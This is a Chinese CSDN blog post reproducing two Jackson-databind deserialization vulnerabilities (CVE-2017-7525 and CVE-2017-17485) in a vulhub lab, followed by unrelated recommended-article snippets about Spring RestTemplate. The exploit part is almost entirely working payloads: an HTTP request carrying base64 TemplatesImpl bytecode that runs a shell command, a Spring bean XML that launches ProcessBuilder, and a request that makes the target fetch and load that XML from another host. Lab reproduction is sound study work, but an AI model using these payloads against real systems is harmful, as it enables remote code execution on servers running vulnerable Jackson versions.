Jackson-databind 反序列化漏洞(CVE-2017-7525&CVE-2017-17485)

最新推荐文章于 2025-04-11 10:44:23 发布
最新推荐文章于 2025-04-11 10:44:23 发布
阅读量893 收藏
点赞数 1
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118436525
版权

漏洞详细

具体详细请移步:https://vulhub.org/#/environments/jackson/CVE-2017-7525/
因为本人实在不懂这方面,只能先复现,然后慢慢磨了。

漏洞复现

CVE-2017-7525
发送以下数据包,即可执行touch /tmp/prove1.txt命令

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 1298

{
  "param": [
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    {
      "transletBytecodes": [
  "yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw=="
      ],
      "transletName": "a.b",
      "outputProperties": {}
    }
  ]
}

这个POC只能运行在目标为JDK7u21以下的环境中,其他情况请更换Gadget

(所谓Gadget应该指的是数据包中com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl这一串)

在这里插入图片描述
CVE-2017-17485
这个漏洞据说是CVE-2017-7525的黑名单绕过
先将以下内容保存为spel.xml,放到服务器上公开

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
    <bean id="pb" class="java.lang.ProcessBuilder">
        <constructor-arg>
            <array>
                <value>touch</value>
                <value>/tmp/prove2.txt</value>
            </array>
        </constructor-arg>
        <property name="any" value="#{ pb.start() }"/>
    </bean>
</beans>

我这里直接用python开了个简单的http
在这里插入图片描述
然后,发送以下数据包,使Jackson加载bean,触发漏洞

POST /exploit HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 138

{
  "param": [
    "org.springframework.context.support.FileSystemXmlApplicationContext",
    "http://192.168.30.128:8000/spel.xml"
  ]
}

在这里插入图片描述

Java-RestTemplate中几种常用方法
兴趣是最好的老师
08-20 363
返回值:exchange() 返回一个 ResponseEntity<T> 对象,其中 T 是响应体的数据类型。功能:exchange() 是最灵活的方法之一,它可以处理所有类型的 HTTP 请求,并允许指定请求的。exchange() 是最通用的方法,可以处理所有 HTTP 方法,并且可以指定响应体的类型。功能:execute() 是一个高度可定制的方法,允许你通过回调接口来处理请求和响应。这些方法的选择取决于你的具体需求。execute() 提供最大的灵活性,允许你完全控制请求和响应的处理流程。
loading怎么关闭 vant_vant的Loading加载组件的使用
weixin_39611275的博客
12-20 2286
在store.js中使用vuex全局控制loading显示与隐藏import Vue from 'vue'import Vuex from 'vuex'Vue.use(Vuex)export default new Vuex.Store({state: {LOADING: false},mutations: {showLoading(state) {state.LOADING = true},hi...
restTemplate.postForObject
daring_xiaowang的博客
07-22 4414
简介:RestTemplate可以进行HTTP服务的调用 导入包:org.springframework.web.client.RestTemplate
Spring RestTemplate使用方法总结
最新发布
申城异乡人
04-11 1084
Spring RestTemplate使用方法总结。
RestTemplate-postForObject详解、调用Https接口、源码解析,读懂这一篇文章就够了
C18298182575的博客
01-26 8673
RestTemplate 是 Spring 提供的,用于访问Rest服务的同步客户端,提供了一些简单的模板方法API;底层支持多种Http客户端类库,因为RestTemplate只是对其他的HTTP客户端的封装,其本身并没有实现HTTP相关的基础功能,底层实现可以按需配置;SimpleClientHttpRequestFactory,默认配置,对应的JDK自带的HttpURLConnection,不支持Http协议的Patch方法,也无法访问Https请求
RestTemplate().postForEntity的参数详解
FJ_love_XY的博客
09-01 5536
可以是任何 Java 类型,包括自定义类型。RestTemplate().postForEntity() 是 Spring Framework 提供的一个用于发送 HTTP POST 请求并获取响应的方法。方法返回一个 ResponseEntity 对象,其中包含 HTTP 响应的状态码、响应头以及解析后的响应体。可以是一个字符串形式的 URL,也可以是一个 URI 对象。类型):可选参数,用于填充 URL 中的占位符。uri(URI 类型):可选参数,代替 url 参数,用于指定完整的请求目标 URI。
java中使用restTemplate.postForObject()方法向es发送请求
z710757293的博客
08-14 2820
restTemplate.postForObject() 方法本质上是将对象放入HttpEntity中,然后将对象POST给一个url。 当我想根据时间范围批量删除一些es中的数据,用到了_delete_by_query的方法,在kibana上面写好测试得没问题了,然后我想把kibana上面整个语句直接发送到es上面。 这是我在kibana上面写的 POST center_data/_delete_by_query { "query": { "bool":{ "must":{
RestTemplate远程请求的艺术
九天的专栏
06-15 976
execute是类中的一个方法,用于执行HTTP请求并返回响应。通过execute方法,可以发送HTTP请求并获取完整的HTTP响应。这个方法相对较低级,需要手动处理请求和响应的细节,包括请求方法、请求头、请求体、URI等信息。使用execute方法可以实现更高度的自定义,但也需要更多的代码来处理HTTP请求和响应。需要传递额外的参数: RequestCallback 和 ResultSetExtractor.该方法不推荐普通开发者使用,一步的业务场景不需要用到高度定制的处理方法。
使用RestTemplate方式发送HTTP请求详解
swadian2008的博客
04-07 6765
目录 一、RestTemplate方式发送HTTP请求代码示例 (1)发送Get请求 (2)发送Post请求 二、RestTemplate详解 1、RestTemplate简述 2、RestTemplate解析 HttpMessageConverter 创建RestTemplate RestTemplate构造方法 3、RestTemplate API使用 GET方法 PO...
RestTemlate源码分析及工具类设计
ZJH
07-30 1187
RestTemplate
http、restTemplate请求资源(含带头部信息)
05-24
在Java开发中,`RestTemplate`是Spring框架提供的一种方便的发送HTTP请求的工具,可以用来执行GET、POST等各种HTTP方法,并处理响应。 首先,我们来详细了解GET和POST两种HTTP请求方法: 1. GET请求:GET是最常见...
SpringBoot使用RestTemplate实现发送HTTP请求
pan_junbiao的博客
10-19 1573
RestTemplate 是 Spring 框架提供的一个用于访问 RESTful 服务的客户端工具,它简化了与 RESTful 服务的交互,并提供了一系列方便的方法来发送 HTTP 请求、处理响应以及处理错误。RestTemplate 提供了一组简单易用的方法,使得发送HTTP请求变得非常简单和直观。RestTemplate 可以自动将请求和响应的 JSON/XML 数据转换为 Java 对象,简化了数据的处理过程。
restTemplate.postForObject 发送POST请求
Jade2388的博客
05-18 2027
import com.alibaba.fastjson.JSONArray; import com.alibaba.fastjson.JSONObject; import com.alibaba.fastjson.JSONPathException; import com.xibei.util.RestTemplateUtil; import org.springframework.http.HttpEntity; import org.springframework.http.HttpHeaders; .
RestTemplate接口请求总结
杜海的博客
03-13 1919
最近做自动化测试,使用RestTemplate调用接口,碰到了各种场景下,什么都不带的,带cookie的,带header的,带参数的,需要获取返回状态码的,先在这稍微总结下,不定期更新 一、获取接口返回状态码 使用getForEntity调用接口,返回结果调用getStatusCode()方法取得HttpStatus对象,然后就可以调用里面的各种方法来满足你的需求了 //判断接口返回是...
RestTemplate使用postForObject发送请求,接收String类型的response时中文乱码
今天能喝可乐吗
10-01 5619
RestTemplate中文乱码原因 使用RestTemplate发送postForObject时,接收的String类型的字符串会出现乱码,这是因为HttpMessageConverter构造器中的StringHttpMessageConverter默认为"ISO-8859-1",此时在不改变HttpMessageConverter构造器集合顺序的情况下将StringHttpMessageConverter构造器的字符编码改为"UTF-8"即可。 第一种方法 使用getMessageConverters
【详解】使用RestTemplate快捷访问restful接口,以postForObject()为例
CodingLJ
11-03 1491
1.RestTemplate是什么?作用是什么? 在微服务中都是以HTTP接口的形式暴露自身服务的,因此在调用远程服务时就必须使用HTTP客户端。比如Spring提供的RestTemplateRestTemplate是Spring提供的用于访问Rest服务的客户端,提供了多种便捷访问远程Http服务的方法,RestTemplate的核心之一 Http Client。RestTemplate 可支持多种 Http Client的对http的访问。 在微服务架构中,不可能每...
初探RestTemplate--postForObject方法直接传递对象
热门推荐
mryang125的博客
07-08 14万+
1.我们通过 http://start.spring.io/ 初始化一个简单的spring boot工程,取名 resttemplate, 由于只研究RestTemplate的特性,故仅添加web即可,如图所示,另外本项目额外添加了alibaba.fastjson这个jar包,你需要在pom.xml添加依赖&lt;!--阿里 FastJson依赖--&gt; &lt;dependency&gt; ...
java RestTemplate
weixin_42394794的博客
06-05 934
使用RestTemplate post请求的时候主要可以通过三种方式实现 1、调用postForObject方法2、使用postForEntity方法 3、调用exchange方法 postForObjectpostForEntity方法的区别主要在于可以在postForEntity方法中设置header的属性,当需要指定header的属性值的时候,使用postForEntity方法。exchange方法和postForEntity类似,但是更灵活,exchange还可以调用get...
Java RestTemplate中几种常见的请求方式
hudeyong926的专栏
03-11 1万+
在REST接口的设计中,利用RestTemplate进行接口测试是种常见的方法。本文主要从以下四个方面来看RestTemplate的使用: GET请求 POST请求 PUT请求 DELETE请求 OK,开始吧。 1. 用exchange方法提交 exchange既可以执行POST方法,还可以执行GET,设置header,所以应用最为广泛。 String url = "http://localhost/mirana-ee/app/login"; RestTemplate client = ne
resttemplate 发送post请求
09-13
`RestTemplate` 是Spring框架提供的用于发送HTTP请求的同步客户端。它提供了多种便捷的方法来执行常见类型的HTTP请求,并且可以很容易地与Spring的声明式REST客户端(如`@RestClient`接口)集成。 要使用`RestTemplate`发送POST请求,你需要创建一个`RestTemplate`实例,然后使用`postForEntity`、`postForObject`或`exchange`等方法之一来发送请求。下面是使用`RestTemplate`发送POST请求的基本步骤: 1. 首先,你需要在项目中引入Spring Web依赖,这样才能使用`RestTemplate`。 2. 创建`RestTemplate`实例,这通常通过Spring的依赖注入来完成。 3. 准备HTTP请求体,通常是将要发送的数据封装在一个POJO对象中。 4. 调用`RestTemplate`的方法发送POST请求,并接收响应。 以下是一个简单的例子,展示了如何使用`RestTemplate`发送POST请求: ```java import org.springframework.web.client.RestTemplate; import org.springframework.http.HttpEntity; import org.springframework.http.ResponseEntity; import org.springframework.http.MediaType; import org.springframework.http.HttpHeaders; // 创建RestTemplate实例 RestTemplate restTemplate = new RestTemplate(); // 设置请求头,指定内容类型为application/json HttpHeaders headers = new HttpHeaders(); headers.setContentType(MediaType.APPLICATION_JSON); // 封装POST请求体 String jsonInputString = "{\"key1\":\"value1\", \"key2\":\"value2\"}"; HttpEntity<String> request = new HttpEntity<>(jsonInputString, headers); // 发送POST请求 ResponseEntity<String> response = restTemplate.postForEntity("http://example.com/api/resource", request, String.class); // 获取响应内容 String result = response.getBody(); ``` 上面的代码中,我们首先创建了一个`RestTemplate`实例。然后,我们设置了请求头,以指示我们希望发送JSON格式的数据。之后,我们创建了一个包含请求数据的`HttpEntity`对象。最后,我们调用`postForEntity`方法发送POST请求,并通过泛型参数`String.class`指定了期望响应体的类型。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值